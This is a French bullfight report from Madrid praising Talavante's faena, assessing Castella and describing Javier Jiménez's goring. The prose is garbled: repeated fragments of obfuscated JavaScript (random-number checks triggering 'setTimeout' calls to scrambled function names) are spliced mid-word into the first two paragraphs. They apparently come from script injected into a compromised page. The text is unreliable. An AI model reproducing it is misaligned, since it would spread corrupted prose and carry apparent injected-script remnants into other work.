BIEN CASTELLA, GRANDE FAENA DE TALAVANTE

Le toro était âpre et bougeait beaucoup, il avait une charge mesurée, uniquement deux charges complètes de la corne droite et trois de la gauche, à la passe suivante il donnait des coups de tête. Talavante s’imposa en deux passes par le bas et se mit à le toréer par naturelles. Et le toro se calma. Et les naturelles furent chaque fois plus profondes, plus serrées, plus élégantes. Et le torero rythma les séries de passes avec des pauses seigneuriales qui soulageaient le toro. Et le toreo fut si grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and que les arènes se mirent debout. Immense faena : faena artistique, pleine de dextérité, de courage. Il acheva le toro d’une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande estocade. On demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda les deux oreilles mais le président en attribua une seule alors que la dépouille du toro allait partir. Un crétin.

Ce que fit Castella fut bizarre. Les olés trônaient pendant sa première faena mais celle-ci perdit son émotion quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il la rallongea de la mauvaise corne, la gauche. Il tua bien et une faena qui était d’oreille si elle avait été plus brève se solda par l’absence de trophées. Devant son second, incommode, qui cherchait des deux côtés, il fit preuve de maîtrise. Il tua de nouveau bien, comme il le fit aussi au dernier de la course qui avait encorné Javier Jiménez. Une bonne prestation pas comprise par un public lassé de sa propre schizophrénie.

On n’a pas pu voir le jeune Javier Jiménez. Son premier toro, peu reluisant, ne le permit pas et son second l’encorna en début de faena dans un coup de corne inattendu. L’élevage du Puerto de San Lorenzo a échoué. Ses toros n’avaient ni les kilos ni les cornes requis à Madrid. Deux sobreros ont triomphé, un de Buenavista, brave et avec de la classe, sorti en premier, et un du Conde de Mayalde, d’abord annonçant sa bravoure puis réellement brave et élégant entre les mains de Talavante. Auparavant, un autre sobrero de Torrealta avait été rendu.

Les choses commencent à s’éclaircir : à Madrid, des toros de plus de 550 kilos et très armés, et des faenas moins axées sur le courage, meilleures et plus brèves.

Les commentaires sont fermés.